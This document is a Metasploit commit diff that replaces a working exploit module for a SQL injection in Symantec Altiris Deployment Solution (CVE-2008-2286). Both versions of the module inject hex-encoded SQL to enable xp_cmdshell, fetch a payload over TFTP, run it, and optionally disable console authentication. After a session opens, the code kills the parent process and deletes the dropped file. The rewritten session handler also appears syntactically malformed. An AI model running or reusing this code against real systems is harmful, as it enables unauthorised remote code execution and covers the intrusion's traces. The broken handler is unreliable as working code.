Introduced PrependMigrate, PPID killing and general clean-up

modules/exploits/windows/mssql/altiris_DS_sqli.rb

@@ -1,221 +0,0 @@
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
-##
-
-require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
-	Rank = NormalRanking
-
-	include Msf::Exploit::CmdStagerTFTP
-	include Msf::Exploit::Remote::Tcp
-
-	def initialize(info = {})
-		super(update_info(info,
-			'Name'           => 'Symantec Altiris DS SQLi 6.8 - 6.9.164',
-			'Description'    => %q{
-					This module exploits a SQL injection flaw in Symantec Altiris Deployment Solution.
-					axengine.exe fails to adequately sanitize numeric input fields in "UpdateComputer"
-					notification Requests. In order to spawn a shell, several SQL injections are required
-					in close succession, first to enable xp_cmdshell, then retrieve the payload via TFTP
-					and finally execute it... you may have to be patient. The module also has the capability
-					to disable/enable local application authentication. This vulnerability was originally
-					found by Brett Moore of Insomnia Security, the exploit was authored by 3v0lver.
-			},
-			'Author'         => [ '3v0lver' ],
-			'License'        => MSF_LICENSE,
-			'Version'        => '$Revision: 14319 $',
-			'References'     =>
-				[
-					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-08-024' ],
-					[ 'BID', '29198'],
-					[ 'CVE', '2008-2286' ],
-				],
-			'Targets'	=>
-				[
-					[ 'Windows Universal',
-						{
-							'Arch' => ARCH_X86,
-							'Platform' => 'win'
-						}
-					]
-				],
-			'Privileged' => true,
-			'Platform' => 'win',
-			'DisclosureDate' => 'May 15 2008',
-			'DefaultTarget' => 0))
-
-		register_options(
-			[
-				Opt::RPORT(402),
-				OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ]),
-				OptBool.new('XP_CMDSHELL', [ false, 'Enable xp_cmdshell prior to sending command', "true"]),
-				OptString.new('MAC', [ false, 'Specify the MAC address of an existing licensed client node', "" ]),
-				OptBool.new('DISABLE_SECURITY', [ false, "Exploit SQLi to execute wc_upd_disable_security and disable Console Authentication", "false" ]),
-				OptBool.new('ENABLE_SECURITY', [ false, "Enable Local Deployment Console Authentication", "false" ])
-			], self.class)
-
-	end
-
-	def windows_stager
-		execute_cmdstager({ :delay => 1.5, :temp => '%temp%\\'})
-	end
-
-	def execute_command(cmd, opts = {})
-
-		inject=[]
-
-		if datastore['XP_CMDSHELL'] == true
-			inject+=[
-			"#{Rex::Text.to_hex("sp_configure \"show advanced options\", 1; reconfigure",'')}",
-			"#{Rex::Text.to_hex("sp_configure \"xp_cmdshell\", 1; reconfigure",'')}",
-				]
-			datastore['XP_CMDSHELL'] = false
-		end
-
-		inject+=["#{Rex::Text.to_hex("wc_upd_disable_security",'')}"] if datastore['DISABLE_SECURITY'] == true
-		inject+=["#{Rex::Text.to_hex("wc_upd_enable_security",'')}"] if datastore['ENABLE_SECURITY'] == true
-		inject+=["#{Rex::Text.to_hex("master.dbo.xp_cmdshell \'cd C:\\Docume~1\\Networ~1\\Locals~1\\temp\\ && cmd.exe /c #{cmd}\'",'')}"] if cmd != nil
-
-		inject.each do |sqli|
-
-		notification = %Q|Request=UpdateComputer
-OS-Bit=32
-CPU-Arch=x86
-IP-Address=192.168.20.107
-MAC-Address=005056C000AB
-Name=Remove_test
-OS=Windows XP
-Version=2.6-38 (32-Bit)
-LoggedIn=Yes
-Boot-Env=Automation
-Platform=Linux
-Agent-Settings=Same
-Sys-Info-TimeZoneBias=0
-Processor=Genuine Intel Intel(R) Core(TM) i7 CPU M 620 @ 2.67GHz
-Processor-Speed=2659, null, null;declare @querya VARCHAR(255);select @querya = 0x#{sqli};exec(@querya);--
-\x00
-|
-
-		connect
-		sock.put(notification)
-		sock.get_once()
-		disconnect
-
-		end
-	end
-
-	def check
-
-		fingerprint = fingerprint_altiris
-
-		if fingerprint =~ /^6\.(\d+)\.(\d+)$/
-			print_status "#{rhost}:#{rport} - Altiris DS Version '#{fingerprint}'"
-			minor = $1.to_i
-			build = $2.to_i
-			if minor == 8 and build < 390
-				if build == 206 || build == 282 || build == 378
-					return Exploit::CheckCode::Vulnerable
-				else
-					return Exploit::CheckCode::Appears
-				end
-			elsif minor == 9 and build < 176
-				#The existence of versions matching this profile is a possibility... none were observed in the wild though
-				#as such, we're basing confidence off of Symantec's vulnerability bulletin.
-				return Exploit::CheckCode::Appears
-			else
-				return Exploit::CheckCode::Safe
-			end
-		else
-			print_status "#{rhost}:#{rport} - This version isn't exploitable: #{fingerprint}"
-			return Exploit::CheckCode::Safe
-		end
-
-	end
-
-	def fingerprint_altiris
-
-notification = %Q|Request=UpdateComputer
-OS-Bit=32
-CPU-Arch=x86
-IP-Address=192.168.20.107
-MAC-Address=005056C000AB
-Name=Remove_test
-OS=Windows XP
-Version=2.6-38 (32-Bit)
-LoggedIn=Yes
-Boot-Env=Automation
-Platform=Linux
-Agent-Settings=Same
-Sys-Info-TimeZoneBias=0
-Processor=Genuine Intel Intel(R) Core(TM) i7 CPU M 620 @ 2.67GHz
-Processor-Speed=2659
-\x00
-|
-
-		connect
-		sock.put(notification)
-		response = sock.get_once()
-		disconnect
-
-		if(response)
-			result_regex = /Result=(.*)/
-			result_response = result_regex.match(response)
-			if result_response[1] == "Success"
-				version_regex = /DSVersion=(.*)/
-				altiris_version = version_regex.match(response)
-				return "#{altiris_version[1]}"
-			else
-				return "unexpected \"UpdateComputer\" response: '#{result_response[1]}'"
-			end
-		else
-			return "No response received, possible congestion issue..."
-		end
-	end
-
-	def exploit
-		if not datastore['CMD'].empty?
-			print_status("Executing command '#{datastore['CMD']}'")
-			execute_command(datastore['CMD'])
-			return
-		elsif datastore['DISABLE_SECURITY'] == true || datastore['ENABLE_SECURITY'] == true
-			execute_command(datastore['CMD'])
-			return
-		else
-			case target['Platform']
-			when 'win'
-				windows_stager
-			else
-				raise RuntimeError, 'Target not supported.'
-				handler
-			end
-		end
-
-	end
-
-	def on_new_session(client)
-
-		return if not payload_exe
-
-		client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
-		client.console.run_single("run migrate -f")
-
-		delete_me_too = "C:\\Docume~1\\Networ~1\\Locals~1\\temp\\#{payload_exe}"
-
-		print_status("Changing permissions on #{delete_me_too} ...")
-		cmd = "C:\\Windows\\system32\\attrib.exe -r -h -s " + delete_me_too
-		client.sys.process.execute(cmd, nil, {'Hidden' => true })
-
-		print_warning("Attempting to delete #{delete_me_too} ...")
-		begin
-			client.console.run_single("rm #{payload_exe}")
-			if client.fs.file.exists?("C:\\Documents and Settings\\NetworkService\\Local Settings\\Temp\\#{payload_exe}")
-				print_warning("Unable to delete #{delete_me_too}; wait a while, and try to rm it later.")
-			end
-		rescue ::Exception => e
-			print_error("Exception: #{e.inspect}")
-		end
-	end
-end

modules/exploits/windows/mssql/altiris_ds_sqli.rb

@@ -0,0 +1,231 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::CmdStagerTFTP	#CmdStagerVBS was tested here as well, however delivery took roughly
+ include Msf::Exploit::Remote::Tcp	#30 minutes and required sending almost 350 notification messages.
+ include Msf::Exploit::FileDropper	#size constraint requirement for SQLi is: linemax => 393 (if you want to try)
+
+ def initialize(info = {})
+  super(update_info(info,
+   'Name'           => 'Symantec Altiris DS SQLi 6.8 - 6.9.164',
+   'Description'    => %q{
+     This module exploits a SQL injection flaw in Symantec Altiris Deployment Solution.
+     axengine.exe fails to adequately sanitize numeric input fields in "UpdateComputer"
+     notification Requests. In order to spawn a shell, several SQL injections are required
+     in close succession, first to enable xp_cmdshell, then retrieve the payload via TFTP
+     and finally execute it... you may have to be patient. The module also has the capability
+     to disable/enable local application authentication. This vulnerability was originally
+     found by Brett Moore of Insomnia Security, the exploit was authored by 3v0lver.
+   },
+   'Author'         =>
+     [
+       'Brett Moore',  # original discovery
+       '3v0lver'       # Metasploit module
+     ],
+   'License'        => MSF_LICENSE,
+   'References'     =>
+    [
+     [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-08-024' ],
+     [ 'BID', '29198'],
+     [ 'CVE', '2008-2286' ],
+    ],
+   'DefaultOptions' =>
+     {
+       'PrependMigrate' => true,
+       'EXITFUNC' => 'process',
+     },
+   'Targets' =>
+    [
+     [ 'Windows Universal',
+      {
+       'Arch' => ARCH_X86,
+       'Platform' => 'win'
+      }
+     ]
+    ],
+   'Privileged' => true,
+   'Platform' => 'win',
+   'DisclosureDate' => 'May 15 2008',
+   'DefaultTarget' => 0))
+
+  register_options(
+   [
+    Opt::RPORT(402),
+    OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ]),
+    OptBool.new('XP_CMDSHELL', [ false, 'Enable xp_cmdshell prior to sending command', true]),
+    OptBool.new('DISABLE_SECURITY', [ false, "Exploit SQLi to execute wc_upd_disable_security and disable Console Authentication", false ]),
+    OptBool.new('ENABLE_SECURITY', [ false, "Enable Local Deployment Console Authentication", false ])
+   ], self.class)
+
+ end
+
+ def windows_stager
+  execute_cmdstager({ :delay => 1.5, :temp => '%temp%\\'})
+ end
+
+ def execute_command(cmd, opts = {})
+  xp_shell_enable = datastore['XP_CMDSHELL']
+  inject=[]
+
+  if xp_shell_enable == true
+   inject+=[
+   "#{Rex::Text.to_hex("sp_configure \"show advanced options\", 1; reconfigure",'')}",
+   "#{Rex::Text.to_hex("sp_configure \"xp_cmdshell\", 1; reconfigure",'')}",
+    ]
+   xp_shell_enable = false
+  end
+
+  inject+=["#{Rex::Text.to_hex("wc_upd_disable_security",'')}"] if datastore['DISABLE_SECURITY'] == true
+  inject+=["#{Rex::Text.to_hex("wc_upd_enable_security",'')}"] if datastore['ENABLE_SECURITY'] == true
+  inject+=["#{Rex::Text.to_hex("master.dbo.xp_cmdshell \'cd C:\\Docume~1\\Networ~1\\Locals~1\\temp\\ && cmd.exe /c #{cmd}\'",'')}"] if cmd != nil
+
+  inject.each do |sqli|
+
+  notification = %Q|Request=UpdateComputer
+OS-Bit=32
+CPU-Arch=x86
+IP-Address=192.168.20.107
+MAC-Address=005056C000AB
+Name=Remove_test
+OS=Windows XP
+Version=2.6-38 (32-Bit)
+LoggedIn=Yes
+Boot-Env=Automation
+Platform=Linux
+Agent-Settings=Same
+Sys-Info-TimeZoneBias=0
+Processor=Genuine Intel Intel(R) Core(TM) i7 CPU M 620 @ 2.67GHz
+Processor-Speed=2659, null, null;declare @querya VARCHAR(255);select @querya = 0x#{sqli};exec(@querya);--
+\x00
+|
+
+  connect
+  sock.put(notification)
+  sock.get_once()
+  disconnect
+
+  end
+ end
+
+ def check
+
+  fingerprint = fingerprint_altiris
+
+  if fingerprint =~ /^6\.(\d+)\.(\d+)$/
+   print_status "#{rhost}:#{rport} - Altiris DS Version '#{fingerprint}'"
+   minor = $1.to_i
+   build = $2.to_i
+   if minor == 8 and build < 390
+    if build == 206 || build == 282 || build == 378
+     return Exploit::CheckCode::Vulnerable
+    else
+     return Exploit::CheckCode::Appears
+    end
+   elsif minor == 9 and build < 176
+    #The existence of versions matching this profile is a possibility... none were observed in the wild though
+    #as such, we're basing confidence off of Symantec's vulnerability bulletin.
+    return Exploit::CheckCode::Appears
+   else
+    return Exploit::CheckCode::Safe
+   end
+  else
+   print_status "#{rhost}:#{rport} - This version isn't exploitable: #{fingerprint}"
+   return Exploit::CheckCode::Safe
+  end
+
+ end
+
+ def fingerprint_altiris
+
+notification = %Q|Request=UpdateComputer
+OS-Bit=32
+CPU-Arch=x86
+IP-Address=192.168.20.107
+MAC-Address=005056C000AB
+Name=Remove_test
+OS=Windows XP
+Version=2.6-38 (32-Bit)
+LoggedIn=Yes
+Boot-Env=Automation
+Platform=Linux
+Agent-Settings=Same
+Sys-Info-TimeZoneBias=0
+Processor=Genuine Intel Intel(R) Core(TM) i7 CPU M 620 @ 2.67GHz
+Processor-Speed=2659
+\x00
+|
+
+  connect
+  sock.put(notification)
+  response = sock.get_once()
+  disconnect
+
+  if(response)
+   result_regex = /Result=(.*)/
+   result_response = result_regex.match(response)
+   if result_response[1] == "Success"
+    version_regex = /DSVersion=(.*)/
+    altiris_version = version_regex.match(response)
+    return "#{altiris_version[1]}"
+   else
+    return "unexpected \"UpdateComputer\" response: '#{result_response[1]}'"
+   end
+  else
+   return "No response received, possible congestion issue..."
+  end
+ end
+
+ def exploit
+  if not datastore['CMD'].empty?
+   print_status("Executing command '#{datastore['CMD']}'")
+   execute_command(datastore['CMD'])
+   return
+  elsif datastore['DISABLE_SECURITY'] == true || datastore['ENABLE_SECURITY'] == true
+   execute_command(datastore['CMD'])
+   return
+  else
+   case target['Platform']
+   when 'win'
+    windows_stager
+   else
+    fail_with(Failure::Unknown, 'Target not supported.')
+   end
+  end
+
+ end
+
+ def on_new_session(client)
+
+  return if not payload_exe
+  #can't scrub dropped payload while the process is still active so...
+  #iterate through process list, find our process and the associated parent process ID, Kill the parent
+  client.core.use("stdapi")
+  client.sys.process.get_processes().each do |proc|
+    if proc['pid'] == client.sys.process.open.pid
+        client.sys.process.kill(proc['ppid'])
+    end
+  end
+
+  delete_me = "C:\\Docume~1\\Networ~1\\Locals~1\\temp\\#{payload_exe}"
+  cmd = "C:\\Windows\\system32\\attrib.exe -r -h -s " + delete_me
+  client.sys.process.execute(cmd, nil, {'Hidden' => true })
+  print_warning("Attempting to delete #{delete_me} ...")
+
+  begin
+    register_file_for_cleanup("#{delete_me}")
+  rescue ::Exception => e
+    print_error("Exception: #{e.inspect}")
+    return
+   end
+  rescue ::Exception => e
+   print_error("Exception: #{e.inspect}")
+  end
+end